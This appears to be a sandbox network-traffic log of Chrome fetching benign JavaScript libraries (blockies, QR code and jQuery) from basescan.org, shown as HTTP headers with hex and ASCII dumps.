                                                                                                                                                                                                                                              77192.168.2.549817104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC362OUTGET /jss/blockies.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:05 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 1897
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=3109
                                                                                                                                                                                                                                              ETag: "0d2ce75dabd41:0"
                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Jan 2019 06:59:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58862
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A7OgFLhy9BHXbd8UaA3E59IL%2B7RMoLAfSGRPQZAYI4r1zlIL36VDasbJZ7SYg1vt2MbICIgymfwptFRlNcXbruORi3%2BF5pVxMuF8LY7XAJCImj3Qg5Tdps6Bx8d97A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d7f9467c7b-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC499INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 61 6e 64 73 65 65 64 3d 6e 65 77 20 41 72 72 61 79 28 34 29 3b 66 75 6e 63 74 69 6f 6e 20 73 65 65 64 72 61 6e 64 28 73 65 65 64 29 7b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 72 61 6e 64 73 65 65 64 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 72 61 6e 64 73 65 65 64 5b 69 5d 3d 30 3b 7d 0a 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 73 65 65 64 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 72 61 6e 64 73 65 65 64 5b 69 25 34 5d 3d 28 28 72 61 6e 64 73 65 65 64 5b 69 25 34 5d 3c 3c 35 29 2d 72 61 6e 64 73 65 65 64 5b 69 25 34 5d 29 2b 73 65 65 64 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 3b 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 72 61 6e 64 28 29 7b 76 61 72 20 74 3d 72 61 6e 64 73 65 65 64 5b 30 5d 5e 28 72 61 6e 64 73
                                                                                                                                                                                                                                              Data Ascii: (function(){var randseed=new Array(4);function seedrand(seed){for(var i=0;i<randseed.length;i++){randseed[i]=0;}for(var i=0;i<seed.length;i++){randseed[i%4]=((randseed[i%4]<<5)-randseed[i%4])+seed.charCodeAt(i);}}function rand(){var t=randseed[0]^(rands
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 36 30 29 2b 34 30 29 2b 27 25 27 3b 76 61 72 20 6c 3d 28 28 72 61 6e 64 28 29 2b 72 61 6e 64 28 29 2b 72 61 6e 64 28 29 2b 72 61 6e 64 28 29 29 2a 32 35 29 2b 27 25 27 3b 76 61 72 20 63 6f 6c 6f 72 3d 27 68 73 6c 28 27 2b 68 2b 27 2c 27 2b 73 2b 27 2c 27 2b 6c 2b 27 29 27 3b 72 65 74 75 72 6e 20 63 6f 6c 6f 72 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 63 72 65 61 74 65 49 6d 61 67 65 44 61 74 61 28 73 69 7a 65 29 7b 76 61 72 20 77 69 64 74 68 3d 73 69 7a 65 3b 76 61 72 20 68 65 69 67 68 74 3d 73 69 7a 65 3b 76 61 72 20 64 61 74 61 57 69 64 74 68 3d 4d 61 74 68 2e 63 65 69 6c 28 77 69 64 74 68 2f 32 29 3b 76 61 72 20 6d 69 72 72 6f 72 57 69 64 74 68 3d 77 69 64 74 68 2d 64 61 74 61 57 69 64 74 68 3b 76 61 72 20 64 61 74 61 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 79
                                                                                                                                                                                                                                              Data Ascii: 60)+40)+'%';var l=((rand()+rand()+rand()+rand())*25)+'%';var color='hsl('+h+','+s+','+l+')';return color;}function createImageData(size){var width=size;var height=size;var dataWidth=Math.ceil(width/2);var mirrorWidth=width-dataWidth;var data=[];for(var y
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC29INData Raw: 69 65 73 3d 7b 63 72 65 61 74 65 3a 63 72 65 61 74 65 49 63 6f 6e 7d 3b 7d 29 28 29 3b
                                                                                                                                                                                                                                              Data Ascii: ies={create:createIcon};})();


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              78192.168.2.549818104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC364OUTGET /jss/qrcode.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC818INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:05 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Jan 2019 06:59:00 GMT
                                                                                                                                                                                                                                              ETag: W/"0d2ce75dabd41:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58862
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=joE3Voi42EqexwJmUMBizglzfVis3G6kdQz91Or1%2FQXeqp0hLxi0riR1iR2LVGS7KJ2QoPRFIpIeMWfSNXIM%2FbLzZ8IqBhF%2F%2BohrkyNYdVOgcdPv1shz3h%2BtzvPAxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d7f9cd4401-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC551INData Raw: 34 64 64 62 0d 0a 76 61 72 20 51 52 43 6f 64 65 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 69 73 2e 6d 6f 64 65 3d 63 2e 4d 4f 44 45 5f 38 42 49 54 5f 42 59 54 45 2c 74 68 69 73 2e 64 61 74 61 3d 61 2c 74 68 69 73 2e 70 61 72 73 65 64 44 61 74 61 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 62 3d 5b 5d 2c 64 3d 30 2c 65 3d 74 68 69 73 2e 64 61 74 61 2e 6c 65 6e 67 74 68 3b 65 3e 64 3b 64 2b 2b 29 7b 76 61 72 20 66 3d 74 68 69 73 2e 64 61 74 61 2e 63 68 61 72 43 6f 64 65 41 74 28 64 29 3b 66 3e 36 35 35 33 36 3f 28 62 5b 30 5d 3d 32 34 30 7c 28 31 38 33 35 30 30 38 26 66 29 3e 3e 3e 31 38 2c 62 5b 31 5d 3d 31 32 38 7c 28 32 35 38 30 34 38 26 66 29 3e 3e 3e 31 32 2c 62 5b 32 5d 3d 31 32 38 7c 28 34 30 33 32 26 66 29 3e 3e
                                                                                                                                                                                                                                              Data Ascii: 4ddbvar QRCode;!function(){function a(a){this.mode=c.MODE_8BIT_BYTE,this.data=a,this.parsedData=[];for(var b=[],d=0,e=this.data.length;e>d;d++){var f=this.data.charCodeAt(d);f>65536?(b[0]=240|(1835008&f)>>>18,b[1]=128|(258048&f)>>>12,b[2]=128|(4032&f)>>
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 2e 75 6e 73 68 69 66 74 28 32 33 39 29 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 61 2c 62 29 7b 74 68 69 73 2e 74 79 70 65 4e 75 6d 62 65 72 3d 61 2c 74 68 69 73 2e 65 72 72 6f 72 43 6f 72 72 65 63 74 4c 65 76 65 6c 3d 62 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 3d 30 2c 74 68 69 73 2e 64 61 74 61 43 61 63 68 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 64 61 74 61 4c 69 73 74 3d 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 69 28 61 2c 62 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 61 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 61 2e 6c 65 6e 67 74 68 2b 22 2f 22 2b 62 29 3b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 26 26 30 3d 3d 61 5b 63 5d 3b 29 63 2b 2b 3b 74 68
                                                                                                                                                                                                                                              Data Ascii: .unshift(239))}function b(a,b){this.typeNumber=a,this.errorCorrectLevel=b,this.modules=null,this.moduleCount=0,this.dataCache=null,this.dataList=[]}function i(a,b){if(void 0==a.length)throw new Error(a.length+"/"+b);for(var c=0;c<a.length&&0==a[c];)c++;th
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 75 72 6e 20 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 61 5d 5b 62 5d 7d 2c 67 65 74 4d 6f 64 75 6c 65 43 6f 75 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 7d 2c 6d 61 6b 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6d 61 6b 65 49 6d 70 6c 28 21 31 2c 74 68 69 73 2e 67 65 74 42 65 73 74 4d 61 73 6b 50 61 74 74 65 72 6e 28 29 29 7d 2c 6d 61 6b 65 49 6d 70 6c 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 3d 34 2a 74 68 69 73 2e 74 79 70 65 4e 75 6d 62 65 72 2b 31 37 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 3d 6e 65 77 20 41 72 72 61 79 28 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 29 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 74 68 69
                                                                                                                                                                                                                                              Data Ascii: urn this.modules[a][b]},getModuleCount:function(){return this.moduleCount},make:function(){this.makeImpl(!1,this.getBestMaskPattern())},makeImpl:function(a,c){this.moduleCount=4*this.typeNumber+17,this.modules=new Array(this.moduleCount);for(var d=0;d<thi
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 6d 6f 64 75 6c 65 73 5b 66 5d 5b 68 5d 3b 6a 26 26 28 64 2e 62 65 67 69 6e 46 69 6c 6c 28 30 2c 31 30 30 29 2c 64 2e 6d 6f 76 65 54 6f 28 69 2c 67 29 2c 64 2e 6c 69 6e 65 54 6f 28 69 2b 65 2c 67 29 2c 64 2e 6c 69 6e 65 54 6f 28 69 2b 65 2c 67 2b 65 29 2c 64 2e 6c 69 6e 65 54 6f 28 69 2c 67 2b 65 29 2c 64 2e 65 6e 64 46 69 6c 6c 28 29 29 7d 72 65 74 75 72 6e 20 64 7d 2c 73 65 74 75 70 54 69 6d 69 6e 67 50 61 74 74 65 72 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 38 3b 61 3c 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 2d 38 3b 61 2b 2b 29 6e 75 6c 6c 3d 3d 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 61 5d 5b 36 5d 26 26 28 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 61 5d 5b 36 5d 3d 30 3d 3d 61 25 32 29 3b 66 6f 72 28 76 61 72 20 62 3d
                                                                                                                                                                                                                                              Data Ascii: modules[f][h];j&&(d.beginFill(0,100),d.moveTo(i,g),d.lineTo(i+e,g),d.lineTo(i+e,g+e),d.lineTo(i,g+e),d.endFill())}return d},setupTimingPattern:function(){for(var a=8;a<this.moduleCount-8;a++)null==this.modules[a][6]&&(this.modules[a][6]=0==a%2);for(var b=
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 2d 31 3b 68 3e 30 3b 68 2d 3d 32 29 66 6f 72 28 36 3d 3d 68 26 26 68 2d 2d 3b 3b 29 7b 66 6f 72 28 76 61 72 20 69 3d 30 3b 32 3e 69 3b 69 2b 2b 29 69 66 28 6e 75 6c 6c 3d 3d 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 64 5d 5b 68 2d 69 5d 29 7b 76 61 72 20 6a 3d 21 31 3b 67 3c 61 2e 6c 65 6e 67 74 68 26 26 28 6a 3d 31 3d 3d 28 31 26 61 5b 67 5d 3e 3e 3e 65 29 29 3b 76 61 72 20 6b 3d 66 2e 67 65 74 4d 61 73 6b 28 62 2c 64 2c 68 2d 69 29 3b 6b 26 26 28 6a 3d 21 6a 29 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 64 5d 5b 68 2d 69 5d 3d 6a 2c 65 2d 2d 2c 2d 31 3d 3d 65 26 26 28 67 2b 2b 2c 65 3d 37 29 7d 69 66 28 64 2b 3d 63 2c 30 3e 64 7c 7c 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 3c 3d 64 29 7b 64 2d 3d 63 2c
                                                                                                                                                                                                                                              Data Ascii: this.moduleCount-1;h>0;h-=2)for(6==h&&h--;;){for(var i=0;2>i;i++)if(null==this.modules[d][h-i]){var j=!1;g<a.length&&(j=1==(1&a[g]>>>e));var k=f.getMask(b,d,h-i);k&&(j=!j),this.modules[d][h-i]=j,e--,-1==e&&(g++,e=7)}if(d+=c,0>d||this.moduleCount<=d){d-=c,
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 74 3d 30 2c 6d 3d 30 3b 64 3e 6d 3b 6d 2b 2b 29 66 6f 72 28 76 61 72 20 6a 3d 30 3b 6a 3c 62 2e 6c 65 6e 67 74 68 3b 6a 2b 2b 29 6d 3c 67 5b 6a 5d 2e 6c 65 6e 67 74 68 26 26 28 73 5b 74 2b 2b 5d 3d 67 5b 6a 5d 5b 6d 5d 29 3b 66 6f 72 28 76 61 72 20 6d 3d 30 3b 65 3e 6d 3b 6d 2b 2b 29 66 6f 72 28 76 61 72 20 6a 3d 30 3b 6a 3c 62 2e 6c 65 6e 67 74 68 3b 6a 2b 2b 29 6d 3c 68 5b 6a 5d 2e 6c 65 6e 67 74 68 26 26 28 73 5b 74 2b 2b 5d 3d 68 5b 6a 5d 5b 6d 5d 29 3b 72 65 74 75 72 6e 20 73 7d 3b 66 6f 72 28 76 61 72 20 63 3d 7b 4d 4f 44 45 5f 4e 55 4d 42 45 52 3a 31 2c 4d 4f 44 45 5f 41 4c 50 48 41 5f 4e 55 4d 3a 32 2c 4d 4f 44 45 5f 38 42 49 54 5f 42 59 54 45 3a 34 2c 4d 4f 44 45 5f 4b 41 4e 4a 49 3a 38 7d 2c 64 3d 7b 4c 3a 31 2c 4d 3a 30 2c 51 3a 33 2c 48 3a 32
                                                                                                                                                                                                                                              Data Ascii: t=0,m=0;d>m;m++)for(var j=0;j<b.length;j++)m<g[j].length&&(s[t++]=g[j][m]);for(var m=0;e>m;m++)for(var j=0;j<b.length;j++)m<h[j].length&&(s[t++]=h[j][m]);return s};for(var c={MODE_NUMBER:1,MODE_ALPHA_NUM:2,MODE_8BIT_BYTE:4,MODE_KANJI:8},d={L:1,M:0,Q:3,H:2
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 30 3b 30 21 3d 61 3b 29 62 2b 2b 2c 61 3e 3e 3e 3d 31 3b 72 65 74 75 72 6e 20 62 7d 2c 67 65 74 50 61 74 74 65 72 6e 50 6f 73 69 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 2e 50 41 54 54 45 52 4e 5f 50 4f 53 49 54 49 4f 4e 5f 54 41 42 4c 45 5b 61 2d 31 5d 7d 2c 67 65 74 4d 61 73 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 20 65 2e 50 41 54 54 45 52 4e 30 30 30 3a 72 65 74 75 72 6e 20 30 3d 3d 28 62 2b 63 29 25 32 3b 63 61 73 65 20 65 2e 50 41 54 54 45 52 4e 30 30 31 3a 72 65 74 75 72 6e 20 30 3d 3d 62 25 32 3b 63 61 73 65 20 65 2e 50 41 54 54 45 52 4e 30 31 30 3a 72 65 74 75 72 6e 20 30 3d 3d 63 25 33 3b 63 61 73 65 20 65 2e 50
                                                                                                                                                                                                                                              Data Ascii: n(a){for(var b=0;0!=a;)b++,a>>>=1;return b},getPatternPosition:function(a){return f.PATTERN_POSITION_TABLE[a-1]},getMask:function(a,b,c){switch(a){case e.PATTERN000:return 0==(b+c)%2;case e.PATTERN001:return 0==b%2;case e.PATTERN010:return 0==c%3;case e.P
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 3d 68 3b 68 2b 2b 29 69 66 28 21 28 30 3e 64 2b 68 7c 7c 64 2b 68 3e 3d 62 29 29 66 6f 72 28 76 61 72 20 69 3d 2d 31 3b 31 3e 3d 69 3b 69 2b 2b 29 30 3e 65 2b 69 7c 7c 65 2b 69 3e 3d 62 7c 7c 28 30 21 3d 68 7c 7c 30 21 3d 69 29 26 26 67 3d 3d 61 2e 69 73 44 61 72 6b 28 64 2b 68 2c 65 2b 69 29 26 26 66 2b 2b 3b 66 3e 35 26 26 28 63 2b 3d 33 2b 66 2d 35 29 7d 66 6f 72 28 76 61 72 20 64 3d 30 3b 62 2d 31 3e 64 3b 64 2b 2b 29 66 6f 72 28 76 61 72 20 65 3d 30 3b 62 2d 31 3e 65 3b 65 2b 2b 29 7b 76 61 72 20 6a 3d 30 3b 61 2e 69 73 44 61 72 6b 28 64 2c 65 29 26 26 6a 2b 2b 2c 61 2e 69 73 44 61 72 6b 28 64 2b 31 2c 65 29 26 26 6a 2b 2b 2c 61 2e 69 73 44 61 72 6b 28 64 2c 65 2b 31 29 26 26 6a 2b 2b 2c 61 2e 69 73 44 61 72 6b 28 64 2b 31 2c 65 2b 31 29 26 26 6a 2b
                                                                                                                                                                                                                                              Data Ascii: =h;h++)if(!(0>d+h||d+h>=b))for(var i=-1;1>=i;i++)0>e+i||e+i>=b||(0!=h||0!=i)&&g==a.isDark(d+h,e+i)&&f++;f>5&&(c+=3+f-5)}for(var d=0;b-1>d;d++)for(var e=0;b-1>e;e++){var j=0;a.isDark(d,e)&&j++,a.isDark(d+1,e)&&j++,a.isDark(d,e+1)&&j++,a.isDark(d+1,e+1)&&j+
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 2e 67 6c 6f 67 28 74 68 69 73 2e 67 65 74 28 63 29 29 2b 67 2e 67 6c 6f 67 28 61 2e 67 65 74 28 64 29 29 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 69 28 62 2c 30 29 7d 2c 6d 6f 64 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 68 69 73 2e 67 65 74 4c 65 6e 67 74 68 28 29 2d 61 2e 67 65 74 4c 65 6e 67 74 68 28 29 3c 30 29 72 65 74 75 72 6e 20 74 68 69 73 3b 66 6f 72 28 76 61 72 20 62 3d 67 2e 67 6c 6f 67 28 74 68 69 73 2e 67 65 74 28 30 29 29 2d 67 2e 67 6c 6f 67 28 61 2e 67 65 74 28 30 29 29 2c 63 3d 6e 65 77 20 41 72 72 61 79 28 74 68 69 73 2e 67 65 74 4c 65 6e 67 74 68 28 29 29 2c 64 3d 30 3b 64 3c 74 68 69 73 2e 67 65 74 4c 65 6e 67 74 68 28 29 3b 64 2b 2b 29 63 5b 64 5d 3d 74 68 69 73 2e 67 65 74 28 64 29 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c
                                                                                                                                                                                                                                              Data Ascii: .glog(this.get(c))+g.glog(a.get(d)));return new i(b,0)},mod:function(a){if(this.getLength()-a.getLength()<0)return this;for(var b=g.glog(this.get(0))-g.glog(a.get(0)),c=new Array(this.getLength()),d=0;d<this.getLength();d++)c[d]=this.get(d);for(var d=0;d<
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 31 35 5d 2c 5b 35 2c 31 35 30 2c 31 32 30 2c 31 2c 31 35 31 2c 31 32 31 5d 2c 5b 39 2c 36 39 2c 34 33 2c 34 2c 37 30 2c 34 34 5d 2c 5b 31 37 2c 35 30 2c 32 32 2c 31 2c 35 31 2c 32 33 5d 2c 5b 32 2c 34 32 2c 31 34 2c 31 39 2c 34 33 2c 31 35 5d 2c 5b 33 2c 31 34 31 2c 31 31 33 2c 34 2c 31 34 32 2c 31 31 34 5d 2c 5b 33 2c 37 30 2c 34 34 2c 31 31 2c 37 31 2c 34 35 5d 2c 5b 31 37 2c 34 37 2c 32 31 2c 34 2c 34 38 2c 32 32 5d 2c 5b 39 2c 33 39 2c 31 33 2c 31 36 2c 34 30 2c 31 34 5d 2c 5b 33 2c 31 33 35 2c 31 30 37 2c 35 2c 31 33 36 2c 31 30 38 5d 2c 5b 33 2c 36 37 2c 34 31 2c 31 33 2c 36 38 2c 34 32 5d 2c 5b 31 35 2c 35 34 2c 32 34 2c 35 2c 35 35 2c 32 35 5d 2c 5b 31 35 2c 34 33 2c 31 35 2c 31 30 2c 34 34 2c 31 36 5d 2c 5b 34 2c 31 34 34 2c 31 31 36 2c 34 2c 31
                                                                                                                                                                                                                                              Data Ascii: 15],[5,150,120,1,151,121],[9,69,43,4,70,44],[17,50,22,1,51,23],[2,42,14,19,43,15],[3,141,113,4,142,114],[3,70,44,11,71,45],[17,47,21,4,48,22],[9,39,13,16,40,14],[3,135,107,5,136,108],[3,67,41,13,68,42],[15,54,24,5,55,25],[15,43,15,10,44,16],[4,144,116,4,1


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              79192.168.2.549816104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC386OUTGET /assets/vendor/jquery/dist/jquery.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC851INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:05 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Thu, 17 Feb 2022 04:48:00 GMT
                                                                                                                                                                                                                                              ETag: W/"040158ab923d81:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58862
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UTg7li4FPW2i%2BdQUYLvJsEqcFLHX%2BIRIKHUM78eWAk%2FHDRb3%2FY1iWCGPaPMp2KXq21N7TyzWi58YnTfroQbvqsRfSY8eq%2F9XgJ1XNGj%2Bgi2uCLEQY9ewHSgvc9u2sQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d7fdab5e74-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC518INData Raw: 37 63 35 66 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 29 20 7b 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 20 22 6f 62 6a 65 63 74 22 20 3d 3d 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 20 26 26 20 22 6f 62 6a 65 63 74 22 20 3d 3d 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3f 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d 20 65 2e 64 6f 63 75 6d 65 6e 74 20 3f 20 74 28 65 2c 20 21 30 29 20 3a 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 20 69 66 20 28 21
                                                                                                                                                                                                                                              Data Ascii: 7c5f/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function (e, t) { "use strict"; "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function (e) { if (!
